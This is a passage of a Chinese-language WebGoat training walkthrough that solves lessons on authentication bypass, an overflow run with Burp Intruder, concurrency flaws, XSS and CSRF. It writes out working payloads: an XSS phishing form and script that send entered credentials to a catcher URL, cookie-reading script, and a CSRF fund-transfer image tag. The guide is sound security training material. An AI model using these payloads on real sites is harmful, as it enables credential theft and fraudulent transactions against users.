For security reasons, please	change your password immediately.

Results: Username: webgoat Color: red Password: webgoat

我们需要做的就是以 admin 用户为例,试着猜测密码保护问题的答案,以获取 admin 的密码。在 User Name 输入 admin。如下图所示:

#### Webgoat Password Recovery Please input your username. See the OWASP admin if you do not have an account.

\*Required Fields

*User Name:	admin

Submit

点击【Submit】后,出现密码保护问题:

Webgoat Password Recovery
Secret Question: What is your favorite color?
*Required Fields

*Answer:	

Submit

我们可以任意输入各种颜色的名称,多次尝试后发现 green 为正确答案。出现如下提示时,攻击成功。

\* Congratulations. You have successfully completed this lesson.

Webgoat Password Recovery For security reasons, please change your password immediately.

Results: Username: admin Color: green

Password: 2275\$starBo0rn3

١



## 2.4.3 基本认证(Basic Authentication)

#### 2.4.3.1 技术概念或主题(Concept / Topic To Teach)

基本身份验证通常用来保护服务端的资源。Web 服务器将发送 401 认证请求与所请求 的资源响应。客户端浏览器会提示用户在浏览器提供的对话框中输入用户名和密码。浏览器 将用户名和密码使用 Base64 编码方式进行编码,并将这些凭据发送给 Web 服务器。Web 服务器会验证这些凭据,如果所提供的凭据正确,则返回所请求的资源。这些凭据会自动重 置每一个使用这一机制的被保护的页面,而不需要用户再次输入这些凭据。

#### 2.4.3.2 技术原理(How It works)

基本认证使用 cookie 传递认证信息,可以使用代理工具拦截请求并查看 cookie。

#### 2.4.3.3 总体目标(General Goals)

本节课程您的目标是理解基础认证并回答问题。

#### 2.4.3.4 操作方法(Solutions)

网站应用通常提供用户找回密码功能,当用户忘记登录密码时,可以根据之前自己设的 密码保护问题才找回密码,例如:用户名为 webgoat 的用户,对于密码保护问题"您最喜欢 的颜色是什么?"的答案是"红色",通过正确回答问题可以重新获得密码,如下图所示:

进入该页面,同时启动 Webscarab。



点击【submit】, Webscarab 截获请求, 在 HTTP 头中包含一个基本身份认证信息 "Authorization", 它的值是"Z3V1c3Q6Z3V1c3Q=", 可以在 Webscarab 的"tools"-"Transcoder"中,选择"Base64 decode"进行编译, 最终得到 code 值"guest:guest"。

👙 Edit Request				
	Intercept requests :	Intercept responses	: 🔲	
Parsed Raw				
Method URL				Version
POST http://neo:80/Web	Goat/attack?menu=310			HTTP/1.1
Header		Value		
Content-Type	app	lication/x-www-form-urler	icoded	<u> </u>
UA-CPU	x86			
Accept-Encoding	gzip	, deflate		
User-Agent	Moz	illa/4.0 (compatible; MSIE	7.0; Windows	Insert
Proxy-Connection	Kee	p-Alive		
Content-length	28			Delete
Host	neo			
Pragma	no-c	ache		
Cookie	JSE	SSIONID=6FDAFA2F732	ACF4E17B236	
Authorization	Bas	ic Z3VIc3Q6Z3VIc3Q=		-
			erororororororororor	<u>utina ana ana ana ana a</u> na ana ana ana ana
URLEncoded Text	Hex			
Variabl	e	Value		
header	0			Incort
value	0			maert
SUBMIT	Su	bmit		Delete
▲ <del></del>				
Accept changes	Cancel changes	Abort request	Cancel ALL inte	rcepts



🔹 Transcoder			
Edit			
Characters: 16			
Z3¥IC3Q6Z3¥IC3Q≈			
URL encode URL decode	Base64 encode Base64 decode	MD5 hash	SHA-1 hash
Transcoder			
it			
racters: 11			
est:guest			
			-
URL encode	Base64 encode	MD5 hash	SHA-1 hash
UDI desede			

在课程页面中输入"Authorization", "guest:guest", 点提交, 完成第一阶段。



在这一课中,重点是让您明白 JSESSIONID cookie 是如何用来进行会话管理,以及如何 用基本身份认证头来进行基本身份认证。当WebGoat 检测到一个有效的会话,您会被自动重 定向到您正在进行的课程页面,如果没有检测到有效会话,WebGoat 会创建一个新的 JSESSIONID,您会看到第一课。以WebGoat 作为基本访问,您需要破坏现有的 JSESSIONID 和 Authorization 头,您可以在Webscarab 中截取请求并删除 JSESSIONID 的值以及 Authorization 头。WebGoat 将要求您进行身份验证,您现在可以输入用户名"basic",密 码"basic"。在日志中显示将以 basic 用户登录。还记得我们的 JSESSIONID 吗?这个 JSESSIONID 是一个非持久性的 cookie,在第一次访问时设置,从浏览器到 WebGoat 的每个 请求都有一个 cookie 值。破坏先前的请求,不会改变存储在浏览器内存中的 cookie 值,这 就是为什么每次请求都会发送以前的 JSESSIONID 值的原因。

现在刷新当前页面,从弹出的 Webscarab 页面中看到目前的 Authorization 是 basic, 密码是 basic。



Parsed	Raw			
Method l	JRL			Version
GET	http://neo:80/Web(	Goat/attack?Screen=13	3&menu=310	HTTP/1.
-	Header	8	Value	1
Accept		im	age/gif, image/x-xbitmap, image/jpeg, imag	1
Referer		htt	p://neo/WebGoat/attack?Screen=133&men	1
Accept-La	nguage	nl-	be	]
UA-CPU		x86		
Accept-Encoding		gz	gzip, deflate	
User-Agent		Mc	Mozilla/4.0 (compatible; MSIE 7.0; Windows N	
Proxy-Connection		Ke	Keep-Alive	
Cookie	12001	JS	ESSIONID=7BA489F4BF8290A4979B9F8A	
Authorizat	ion	Ba	isic YmFzaVVM6YmFzaVVM=	
Host		ne	0	
A 7				]
Hex				
Pacitio	n 0 1 2 2	1 E E 7 0 0 A		
FUSILIO	11 0 1 2 3	4 J U 7 O B A		

OWASP 中

由于需要有效的 JSESSIONID, WebGoat 身份验证的用户通过服务器端使用 getSession().getUser()方法检索。为了让WebGoat 相信您就是被认证的 basic 用户, 您需 要按照图中的方式修改 JSESSIONID=novalidsession。

Parsed	Raw			
Method L	JRL			Version
GET	http://neo:80/Web	Goat/attack?Screen=1	33&menu=310	HTTP/1.1
	Header	r I	Value	1
Accept		ir	mage/gif, image/x-xbitmap, image/jpeg, imag	1
Referer		h	ttp://neo/WebGoat/attack?Screen=133&men	
Accept-La	nguage	n	Il-be	
UA-CPU		X	x86	
Accept-Encoding		g	gzip, deflate	
User-Agent		N	Mozilla/4.0 (compatible; MSIE 7.0; Windows N	
Proxy-Connection		K	Keep-Alive	
Host		n	180	1
Cookie		J	SESSIONID=novalidsession	1
Authorizati	on	E	Basic YmFzaWM6YmFzaWM=	
Hoy				
TIGA				
Desition	n 0 1 2 3	4 5 6 7 8 9 A	B C D E F String	
FUSICIO				
FUSILIUI				

现在您被重定向到开始页面,JSESSIONID 改变了,您失去了所有的绿色对勾(代表已



完成课程)。因为 basic 用户没有完成任何 WebGoat 的课程。现在进入"Basic Authentication" 课程即可完成本课

## 2.4.4 多级登录1(Multi Level Login 1)

#### 2.4.4.1 技术概念或主题(Concept / Topic To Teach)

多级登录提供了一个健壮的验证。这是加入第二层的存档。在通过您的用户名密码登录 后,您可以请求一个"交易认证号(TAN)"。这经常用于网上银行。您得到一个银行提 供的由很多交易认证号生成唯一的列表,每个交易认证号只能使用一次。另一种方法是用短 信提供一个交易认证号,这样做的好处是攻击者无法获得用户的交易认证号。

#### 2.4.4.2 技术原理(How It works)

很多用过的验证码往往能够被再次使用。

#### 2.4.4.3 总体目标(General Goals)

本机课程中您需要尝试绕过系统强壮的认证。您必须攻击另一个帐号。系统已经提供了 用户名、密码和一个已经使用了的 TAN。您需要让系统接受该序列号,尽管它已经被使用 了。

## 2.4.4.4 操作方法(Solutions)

本节课程有两个步骤:第一步骤仅仅向您展现多级登录是如何工作的;第二步您需要攻 破这一强壮的认证。

第一步:登录系统,用户名: Jane, 密码: tarzan。





Fied	se Login	
Enter your name:	Jane	
Enter your password:	******	
S	ubmit	

输入第一个交易认证号15648,提交后第一步完成。

άΦ.		
	Please Login	
	Enter TAN #1: 15648	
	Cubinit	
		Logout

第二步:在第一步中,我们只是介绍了多级登录的工作原理,接下来第二步就是如何破坏这种验证机制。首先开启 Webscarab,然后跟第一步一样使用用户名: Jane,密码: tarzan 进行登录。在输入 TAN 处继续输入 15648,然后提交,这时 Webscarab 会提示拦截信息。我们需要做的就是把 hidden\_tan 的值改为 1,即可完成该课程。


			. one	UNTEriconen
	Value			Variable
			1	nidden_tan
		18	1564	an
		mit	Sub	Submit
Insert				
Delete				

## 2.4.5 多级登录 2(Multi Level Login 2)

#### 2.4.5.1 技术概念或主题(Concept / Topic To Teach)

参考上节。

#### 技术原理(How It works) 2.4.5.2

参考上节。

#### 总体目标(General Goals) 2.4.5.3

在这一课中,您将要尝试破坏这种认证,通过其他账号进行登录。您需要做的是通过其 他账号登录,在只知道目标用户名的情况下,以该用户名身份登录系统。

#### 操作方法(Solutions) 2.4.5.4

以用户名 Joe, 密码 banana 登录, 然后输入 TAN 提交, 通过 Webscarab 截取请求。



URLEncoded 1	ext Hex
Variable	Value
hidden_user	Jane
tan2	4894
Submit	Submit
	Insert
	Delete

将 hidden\_user 中的 Joe 改为 Jane, 然后选择确定, 您将以 Jane 登录系统, 该课程完成。

## 2.5 缓冲区溢出(Buffer Overflows)

## 2.5.1 Off-by-One 缓冲区溢出(Off-by-One Overflows)

#### 2.5.1.1 技术概念或主题(Concept / Topic To Teach)

缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量,溢出的 数据覆盖在合法数据上。理想的情况是程序检查数据长度并不允许输入超过缓冲区长度的字 符,但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢 出埋下隐患。

## 2.5.1.2 技术原理(How It works)

通过向程序的缓冲区写入超出其长度的内容,导致缓冲区的溢出,从而破坏程序的堆栈, 造成程序崩溃或使程序转而执行其它指令,以达到攻击的目的。造成缓冲区溢出的原因是程 序中没有仔细检查用户输入的参数。

缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统、应用软件中广泛存在。 利用缓冲区溢出攻击,可以导致程序运行失败、系统宕机、重新启动等后果。更为严重的是, 可以利用它执行非授权指令,甚至可以取得系统特权,进而进行各种非法操作。



### 2.5.1.3 总体目标(General Goals)

欢迎您来到 OWASP 宾馆! 您能否找出 VIP 客户住在哪个房间? 您需要提供以下相关 信息才能访问互联网。

#### 2.5.1.3.1 Step 1/2

请确保您输入的姓名信息与宾馆注册系统中的信息完全相同。

#### 2.5.1.3.2 Step 2/2

请选择下方的上网套餐。 请确保您选择的选项与实际使用时间匹配,本服务不提供任何退款。

#### 2.5.1.4 操作方法(Solutions)

#### 本节使用 BurpSuite 完成。

第一步时随便填写,也不用拦截。

Choose another langua	Choose another language: English 💌			Logout 🕜		
	Ser in		Off-by-One	Overflows		
OWASP WebGoat v5.4	┥ Hints 🕨 Show Params	Show Cookies Less	on Plan Show Ja	va Solution		
Introduction General Access Control Flaws AlAX Security	Solution Videos		R	estart this Lesson		
Authentication Flaws Buffer Overflows	Welcome to the OWASP Hote	el! Can you find out whic	n room a VIP guest	is staying in?		
Off-by-One Overflows	In order to access the Interne	et, you need to provide u	s the following infor	mation:		
Code Quality Concurrency Concurrency	Step 1/2					
Cross-Site Scripting (XSS) Improper Error Handling Injection Flaws Denial of Service	Ensure that your first and last registration system.	names are entered exac	tly as they appear	in the hotel's		
Insecure Communication Insecure Configuration Insecure Storage	First Name:	abc		*		
Malicious Execution Parameter Tampering Session Management Flaws Web Services	Last Name:	def		*		
Admin Functions Challenge	Room Number:	123		*		
		Submit				
	* The above fields are require	ed for login.				
		Crea	ted by Yiannis Pavlosoglou			

第二步时,选择【24小时】的选项,点击【Accept Terms】提交时拦截数据。



OWASP Foundation | Project WebGoat | Report Bug

将该 request 请求拦截后发往 intruder, 然后将参数 room\_no 设为溢出目标。没错, 就是 它(此时如果查看网页源代码, 会发现, 在这第二次提交时, 包括 room\_no 在内的三个参 数都是 hidden 的 input 方式)。如图, 攻击类型选择 sniper。

at Maanuas haugas ohoola	optons		
tack type sniper			
payload position	length: 720		
<pre>viii &gt; viii &gt; 00: 10: 100 Disr: 10: 00: 00: 00: 100 Disr: 10: 00: 00: 00: 10: 00: 00: 00: 00: 00</pre>	- 0 matches	add § clear § avlo § refresh	

接下来,如下图,payloads 方案选择【character blocks】,意思就是用大量的字符填充, 图中payloads方案下面4个填充处含义为:N多的3,从最小值3\*1024=3072开始到3\*1024000, 步长1024,这些设置都随意,只要满足足够长,够溢出即可。然后点击图中左上方【intruder】 下拉菜单中的【attrack】进行攻击。



burp <mark>(</mark> intruder)repeater window about	
target proxy spider scanner intruder repeater sequencer decoder comparer options alerts	
target positions payloads options	
number of payloads: 1,000	
number of requests: 1,000	
payload set 1 💌 character blocks	
base string 3	
min length 1024	
max length 1024000	
sten 1024	
payload processing rules	
edit	
remove	
up	
uowi	
select rule type add	
na tool operating within regulate	

步长 1024, 一共是执行了 1000 多次 request。完成后,如下图,在结果中将【length】 列按照升序排序,点击最大的数值那行(最大值都没溢出,说明不够大)。然后点击下方 【response】响应中的 html,可以看到【congratulation】字眼了,或者点击那个【render】直 接看根据【response】生成的网页,但是由于未加载配置文件,预览效果不加。但的确通过 了本节课程。

filter: sho	owing all items					
results	target position	is payloads	option	s		
request	payload	status	error tim	eo. length	comment	
.80	1003520 x 3	200		1036131		
.81	1004544 x 3	200		1037223		
82	1005568 x 3	200		1038179		
84	1007616 x 3	200		1040295		
85	1008640 x 3	200		1041319		
88	1011712 x 3	200		1044391		
89	1012736 x 3	200		1045347		
90	1013760 x 3	200		1046439		
91	1014784 x 3	200		1047463		
94	1017856 x 3	200		1050535		
95	1018880 x 3	200		1051559		
97	1020928 x 3	200		1053607		
000	1024000 x 3	200		1055723		
99	1022976 x 3	200		1056060		
roquoet	raenonea					
request	response					
raw h	neaders hex	html render	r			
	<div id="le&lt;/td&gt;&lt;td&gt;ssonContent&lt;/td&gt;&lt;td&gt;"></div>					
	Welco	me to the				
	<b>OWA</b>	SP Hotel </td <td>р&gt;</td> <td></td> <td></td> <th></th>	р>			
	! Can	you find	out whic	h room a \	/IP guest is s	taying in?
- 1						
	* Congr	atulations.	. You ha	ave success	fully complet	ed this lesson.
	(BR)					
	* Congr	atulations.	. Iou ha	we success	stully complet	ed this lesson. (/ div/
	<ary 1a="16&lt;/td"><td>ssoncontent</td><td>-' IBIKNOW</td><td>17<sup>2</sup> 1 <sup>2</sup> T</td><td>00CT2</td><th>· · · · · · · · · · · · · · · · · · ·</th></ary>	ssoncontent	-' IBIKNOW	17 <sup>2</sup> 1 <sup>2</sup> T	00CT2	· · · · · · · · · · · · · · · · · · ·
	Torm ac	cept-charset	WORANO =	n method= 1	OSI name= form	action= attack/screen=120amenu=000 enctype= /iou nave r
to the	the chr ()					

完成课程后页面如下图所示:

The Open Wab Application Security Projo	t	http://www.owasp.org
Choose another langua	ge: English 💙	Logout 🕜
		Off-by-One Overflows
OWASP WebGoat v5.4	Hints 🕨 Show Params Show Cookies	Lesson Plan Show Java Solution
Introduction General Access Control Flaws	Solution Videos	Restart this Lesson
AJAX Security Authentication Flaws Buffer Overflows	Welcome to the <b>OWASP Hotel</b> ! Can you find o	out which room a VIP guest is staying in?
Gode Quality	* Congratulations. You have successfully * Congratulations. You have successfully	y completed this lesson. y completed this lesson.
Concurrency Cross-Site Scripting (XSS) Improper Error Handling	You have now completed the 2 step process a	nd have access to the Internet
Injection Flaws Denial of Service	Process complete	
Insecure Communication Insecure Storage Malicious Execution Parameter Tampering Session Management Flaws Web Services Admin Functions	Your connection will remain active for the time	e allocated for starting now.
Challenge	We would like to thank you for your payment.	
		Created by Yiannis Pavlosoglou
	OWASP Foundation   Project WebGoat   Repor	rt Bug

# 2.6 代码质量(Code Quality)

「「「」」の「」」

## 2.6.1 在 HTML 中找线索(Discover Clues in the HTML)

#### 2.6.1.1 技术概念或主题(Concept / Topic To Teach)

众所周知,很多开发者喜欢在源代码中保存 FIXME's、Code Broken、Hack 等语句。通过审查源代码中的相关注释往往能找到密码、后门及一些潜在的问题。

#### 2.6.1.2 技术原理(How It works)

浏览器工具菜单中"view source"功能可以查看网页 HTML 源代码。

## 2.6.1.3 总体目标(General Goals)

通过认证检查。

## 2.6.1.4 操作方法(Solutions)

在当前页面单击鼠标右键,选择"查看源代码"。阅读代码中相关注释,能够找到有用



的信息: admin/adminpw



使用该密码成功登录系统则通过本节课程学习。

# 2.7 并发(Concurrency)

## 2.7.1 线程安全问题(Thread Safety Problems)

#### 2.7.1.1 技术概念或主题(Concept / Topic To Teach)

Web 应用程序可以同时处理很多 HTTP 请求。开发人员经常使用的变量不是线程安全的。线程安全是指一个对象或类的领域在多线程同时使用的时候总是保持有效的状态。它往往可以利用并发错误,精确地在同一时间同一个页面加载另一个用户。

因为所有的线程共享同一个方法区,而所有的类变量存储在方法区,多个线程试图同时 使用相同的类变量。

用户利用 Web 应用程序中的并发错误,查看同一时间另一个用户试图登录同一个功能的信息。

#### 2.7.1.2 技术原理(How It works)

Web 应用程序通常在同一时间要处理很多 HTTP 请求。



### 2.7.1.3 总体目标(General Goals)

用户需要成功利用 Web 应用程序的并发错误。查看另一位正在使用相同功能的用户的 登录信息。

#### 2.7.1.4 操作方法(Solutions)

打开两个浏览器,一个输入用户名 jeff,另一个输入用户名 dave。尽可能快的同时按下两个浏览器中的 submit 按钮。显示的结果却都是 jeff 的信息,如图:



## 2.7.2 购物车并发缺陷(Shopping Cart Concurrency Flaw)

#### 2.7.2.1 技术概念或主题(Concept / Topic To Teach)

Web 应用程序可以同时处理很多 HTTP 请求。开发人员经常使用的变量不是线程安全的。线程安全是指一个对象或类的领域在多线程同时使用的时候总是保持有效的状态。它往往可以利用并发错误,精确地在同一时间同一个页面加载另一个用户。

因为所有的线程共享同一个的方法区,所有的类变量存储在方法区,多个线程试图同时 使用相同的类变量。



用户利用 Web 应用程序中的并发错误,查看同一时间另一个用户试图登录同一个功能的信息。

#### 2.7.2.2 技术原理(How It works)

不涉及。

#### 2.7.2.3 总体目标(General Goals)

在这个练习中,您的目的是利用并发性问题,以较低的价格购买商品。

#### 2.7.2.4 操作方法(Solutions)

开启两个浏览器窗口,窗口A中,选择较便宜的商品,点击【purchase】按钮。如图:

Place your order			
Shopping Cart Items	Price	Quantity	Subtotal
Hitachi - 750GB External Hard Drive	\$169.00	0	\$0.00
Hewlett-Packard - All-in-One Laser Printer	\$299.00	1	\$299.00
Sony - Vaio with Intel Centrino	\$1799.00	0	\$0.00
Toshiba - XGA LCD Projector	\$649.00	0	\$0.00
Total:			\$299.00

Enter your credit card number: 5321 1337 8888 2007
Enter your three digit access code: 111
Confirm
Cancel

在窗口 B 中,选择较贵的商品,并按下【update card】按钮。如图:



S	hopping	Cart	
Shopping Cart Items	Price	Quantity	Subtotal
Hitachi - 750GB External Hard Drive	\$169.00	0	\$0.00
Hewlett-Packard - All-in-One Laser Printer	\$299.00	0	\$0.00
Sony - Vaio with Intel Centrino	\$1799.00	1	\$1,799.00
Toshiba - XGA LCD Projector	\$649.00	0	\$0.00

Total: \$1,799.00

Update Cart

Purchase

打开窗口 A, 按下【confirm】按钮, 即可达到目的。

\* Thank you for shopping! You have (illegally!) received a 83% discount. Police are on the way to your IP address. \* Congratulations. You have successfully completed this lesson.

Thank you for your pur Confirmation number: C	chase! ONC-88		
Shopping Cart Items	Price	Quantity	Subtotal
Hitachi - 750GB External Hard Drive	\$169.00	0	\$0.00
Hewlett-Packard - All-in-One Laser Printer	\$299.00	0	\$0.00
Sony - Vaio with Intel Centrino	\$1799.00	1	\$1,799.00
Toshiba - XGA LCD Projector	\$649.00	0	\$0.00

Total Amount Charged to Your Credit Card:

\$299.00

Return to Store

# 2.8 跨站脚本攻击(Cross-Site Scripting (XSS))

# 2.8.1 使用 XSS 钓鱼(Phishing with XSS)

#### 2.8.1.1 技术概念或主题(Concept / Topic To Teach)

在服务端对所有输入进行验证总是不错的做法。当用户输入非法 HTTP 响应时容易造成 XSS。在 XSS 的帮助下,您可以实现钓鱼工具或向某些官方页面中增加内容。对于受害者 来说很难发现该内容是否存在威胁。



#### 2.8.1.2 技术原理(How It works)

HTML 文档的内容是可以被篡改的,如果您有权限操作页面源代码。

#### 2.8.1.3 总体目标(General Goals)

创建一个 form,要求填写用户名和密码。将数据提交到 http://localhost/WebGoat/catche r?PROPERTY=yes&user=catchedUserName&password=catchedPasswordNam

#### 2.8.1.4 操作方法(Solutions)

利用 XSS 可以在已存在的页面中进一步添加元素。该解决方案包括两部分, 您需要结合 起来使用:

受害人填写一个表格;

以读取脚本的形式,将收集到的信息发送给攻击者。

一个带用户名和密码输入框的表格如下:

<form>

<br><br><br><HR><H3>This feature requires account login:</H3><br><br><br>

Enter Username:<br><input type="text" id="user" name="user"><br>

Enter Password:<br><input type="password" name = "pass"><br>

搜索这段代码,您就能看到页面中增加了一个表单。

现在您需要一段脚本:

<script>

function hack()

{ alert("Had this been a real attack... Your credentials were just stolen." User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+ document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";

</script>

}

这段代码会读取您在表单上输入的用户名和密码信息,将这些信息发送给捕获这些信息 的 WebGoat。

最后,就是要将这两段代码合并。最终需要输入的代码如下:

<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+



搜索这段代码,您会看到一个要求输入用户名密码的表单,输入用户名密码,点击登录, WebGoat 会将您输入的信息捕获并反馈给您。

#### WebGoat Search

This facility will search the WebGoat source.

|  | Search: | <script></script> |
--	---------	-------------------

## 2.8.2 小实验: 跨站脚本攻击(LAB: Cross Site Scripting)

#### 2.8.2.1 技术概念或主题(Concept / Topic To Teach)

输入验证是一个很好的方法,尤其是验证那些以后将用做参数的操作系统命令、脚本和数据库查询的输入。尤为重要的是,这些内容将会永久的存放在那里。应当禁止用户创建消息内容。用户的信息被检索时,可能导致其他用户加载一个不良的网页或不良的内容。当一个未经验证的用户的输入作为一个 HTTP 响应时,XSS 攻击也可能会发生。在一个反射式XSS 攻击中,攻击者会利用攻击脚本精心制作一个 URL 并通过将其发送到其他网站、电子邮件、或其他方式骗取受害者点击它。



### 2.8.2.2 总体目标(General Goals)

在这个练习中,您将执行存储和反射 XSS 攻击,您还可以通过在 web 应用程序中调整 代码来防护这种攻击。

#### 2.8.2.3 Stage 1:存储型 XSS(Stage 1: Stored XSS)

#### 2.8.2.3.1 总体目标(General Goals)

执行存储型跨站脚本攻击;

以"Tom"身份登录网站,修改个人信息。验证用户"Jerry"会受到攻击。每个帐号的 密码是用户明名字的小写(如: Tom 的密码是 tom)。

### 2.8.2.3.2 操作方法(Solutions)

1. 以用户名 "Tom" 密码 tom 登录,选择 Tom,点击"View Profile"按钮。现在可 以看到 Tom 的个人信息。点击"Edit Profile",在"Street"一栏中进行 XSS 攻击。加入 如下代码,点击"UpdateProfile":

- Welcon	ne Back Tom		
Mill Hereon			
First Name:	Tom	Last Name:	Cat
Street:	<script></script>		

2. 退出登录,以用户名 Jerry, 密码 jerry 登录,选择浏览 Tom 的信息,会弹出这段 注入脚本。



## 2.8.2.4 Stage 2: 使用输入验证阻止存储型 XSS 攻击(Stage 2:

#### Block Stored XSS using Input Validation)

#### 2.8.2.4.1 总体目标(General Goals)

Stage 2: 使用输入验证阻止存储式 XSS 攻击 本节课程只能在 WebGoat 开发版本上完成。

完成代码修复,在数据被写入数据库之前阻止存储型跨站攻击脚本。重复 Stage1,以 Eric 和 David 身份再次测试,验证管理用户 David 不受攻击影响。

#### 2.8.2.4.2 操作方法(Solutions)

通过将放置在org.owasp.webgoat.lessons.CrossSiteScripting包中的UpdateProfile.java类中添加如下代码,可防止此类攻击。

/\*\*Your code\*\*/ String regex = "[\\s\\w-,]\*"; String stringToValidate = firstName+lastName+ssn+title+phone+address1+address2+ startDate+ccn+disciplinaryActionDate+

disciplinaryActionNotes+personalDescription;





Pattern pattern = Pattern.compile(regex);

validate(stringToValidate, pattern);

/\*\*End of your code\*\*/

这段验证代码只允许\s = whitspace: \t\n\x0B\f\r, \w = word: a-zA-Z\_0-9 通过验 证。使用其他字符将会抛出验证异常。

## 2.8.2.5 Stage 3:存储型 XSS 重访问(Stage 3: Stored XSS

#### **Revisited**)

### 2.8.2.5.1 总体目标(General Goals)

雇员"Bruce"的个人信息在预载入时携带了存储型 XSS 攻击代码。验证 David 帐号仍然 受影响,即使 Stage2 中做过相关的修复。

## 2.8.2.5.2 操作方法(Solutions)

以用户 David, 密码 david 登录, 然后浏览 Bruce 的信息, 即可完成。

Stage 2 Stage 2: Block Stored XSS using Input Validation.	
THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSI	ON OF WEBGOAT
Implement a fix to block the stored XSS before it can be written 'Eric' with 'David' as the manager. Verify that 'David' is not affect	to the database. Repeat stage 1 as ted by the attack.
* You have completed Stage 1: Stored XSS. * Welcome to Stage 2: Block Stored XSS using Input Valid	lation
Goat Lille Einancial	来自网页的消息
Human Resources	
Welcome Back David	JSESSIONID=C6451B5B810F2ABA62EA9B4B9CEDB198;
First Name: Bruce Last Name: McGuirre Street: 8899 FreeBSD Drive	acgroupswithpersist=nada
	通定
raan-208imanii-000	





# 2.8.2.6 Stage 4: 使用输出编码阻止存储型 XSS(Stage 4: Block Stored XSS using Output Encoding)

## 2.8.2.6.1 总体目标(General Goals)

#### 本节课程只能在 WebGoat 开发版本上完成。

修改代码功能,从数据库中读取数据后阻止跨站攻击代码。同时回到 Stage3 验证 David 用户不受 Bruce 个人信息页面攻击影响。

### 2.8.2.6.2 操作方法(Solutions)

在 org.owasp.webgoat.util.HtmlEncoder 类中添加一个 encode(String s)静态方法。这个方 法更改所有字符串中的特殊字符。现在您可以用 org.owasp.webgoat.lessons.CrossSiteScriptin g class 类中的 getEmployeeProfile 这个方法。用 HtmlEncoder.encode(answer\_results.getString (someString))替换所有 answer\_results.getString(someString),即可完成。

#### 2.8.2.7 Stage 5: 反射型 XSS(Stage 5: Reflected XSS)

#### 2.8.2.7.1 总体目标(General Goals)

使用雇员搜索页面漏洞构造一个包含反射型 XSS 攻击代码的 URL。验证另一位雇员访问 该 URL 会受影响。

#### 2.8.2.7.2 操作方法(Solutions)

以用户名 Larry, 密码 larry 登录。点击"SearchStaff",在搜索框中,添加如下一段代码即可完成:

<script>alert("Dangerous");</script>



2ª	Goat Hills Financial Human Resources	
۳.		د)
	Search For User Name +rt("Dangerous"); FindProfile	

## 2.8.2.8 Stage 6: 阻止反射型 XSS(Stage 6: Block Reflected XSS)

#### 2.8.2.8.1 总体目标(General Goals)

本节课程只能在 WebGoat 开发版本上完成。 修改代码,修复反射型 XSS 攻击。重复 Stage5 验证攻击不再生效。

## 2.8.2.8.2 操作方法(Solutions)

方法类似于第二阶段。编辑 org.owasp.webgoat.lessons.CrossSiteScripting.FindProfile.java, 在 getRequestParameter 方法后面添加下面代码:

String regex = "[\\s\\w-,]\*";

String parameter = s.getParser().getRawParameter(name);

Pattern pattern = Pattern.compile(regex);

validate(parameter, pattern);

return parameter;



## 2.8.3 存储型 XSS 攻击(Stored XSS Attacks)

#### 2.8.3.1 技术概念或主题(Concept / Topic To Teach)

过滤所有用户输入是一个不错的做法,特别是那些后期会被用作 OS、脚本或数据库查 询参数的输入。尤其是那些将要长期存储的内容。用户不能创建非法的消息内容,例如:可 以导致其他用户访问时载入非预期的页面或内容。

#### 2.8.3.2 总体目标(General Goals)

创建非法的消息内容,可以导致其他用户访问时载入非预期的页面或内容。

### 2.8.3.3 操作方法(Solutions)

在 title 中任意输入字符。在内容中输入以下代码:

<script>alert('xss')</script>

或者<script language="javascript" type="text/javascript">alert("Ha Ha Ha");</script>

点提交。如图所示:

Solution VideosIt is always a good practice to scrub all input, especially those inputs that will later be used as

parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere in the application. Users should not be able to create message content that could cause another user to load an undesireable page or undesireable content when the user's message is retrieved.

Title: Message:			*
			-
Submit			
Message Lis <script>alert(': qq ab</td><td>i<b>t</b> xss')</script>			
		ASPI	Application Security Specialists

OWASP Foundation | Project WebGoat | Report Bug

点击"ab",这就好比您刚创建的帖子,由您或者其他人浏览,然后会弹出一个对话框, 证明 XSS 攻击成功。



Solution VideosIt is always a good practice to scrub all input, especially those inputs that will later be used as

parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere in the application. Users should not be able to create message content that could cause another user to load an undesireable page or undesireable content when the user's message is retrieved.

* Congratulations. You have su	ccessfully completed this less	来自网页的消息
Title: Message:	]	1 x55
Submit		
Message Contents For: ab		

Message contents Fo Title: ab Message:

输入<script language="javascript" type="text/javascript">alert(document.cookie);</script> 可以获取当前浏览者 cookie。

## 2.8.4 跨站请求伪造(Cross Site Request Forgery (CSRF))

#### 2.8.4.1 技术概念或主题(Concept / Topic To Teach)

本节课程将指导您如何实现跨站请求伪造攻击(CSRF)。

## 2.8.4.2 技术原理(How it works)

跨站请求伪造是一种让受害者加载一个包含网页的图片的一种攻击手段。如下代码所示: <img src="http://www.mybank.com/sendFunds.do?acctId=123456"/>

当受害者的浏览器试图打开这个页面时,它会使用指定的参数向 www.mybank.com 的 transferFunds.do 页面发送请求。浏览器认为将会得到一个图片,但实际上是一种资金转移 功能。该请求将包括与网站相关的任何 cookies。因此,如果用户已经通过网站的身份验证,并有一个永久的 cookie,甚至是当前会话的 cookie,网站将没有办法区分这是否是一个从合 法用户发出的请求。通过这种方法,攻击者可以让受害者执行一些他们本来没打算执行的操 作,如注销、采购项目或者这个脆弱的网站提供的任何其他功能。



#### 2.8.4.3 总体目标(General Goals)

在这一课中,您的目的是向一个新闻组发送一封邮件,邮件中包含一张图片,这个图像的 URL 指向一个恶意请求。尝试一个包括 1\*1 像素的图像,其中包含一个网址。这个 URL 应当用一个额外的参数 "transferFunds= 4000" 指向 CRSF 课程页面。您可以通过左侧菜单在 CSRF 课程连接上右键单击,选择复制快捷方式。无论谁收到这封邮件,并恰好已经通过身份验证,他的资金将会被转走。

注意:不同 WebGoat 环境的 URL 中 "Screen"和 "Menu"参数可能会有所区别。请使用您但前访问 URL 中正在使用的参数。

#### 2.8.4.4 操作方法(Solutions)

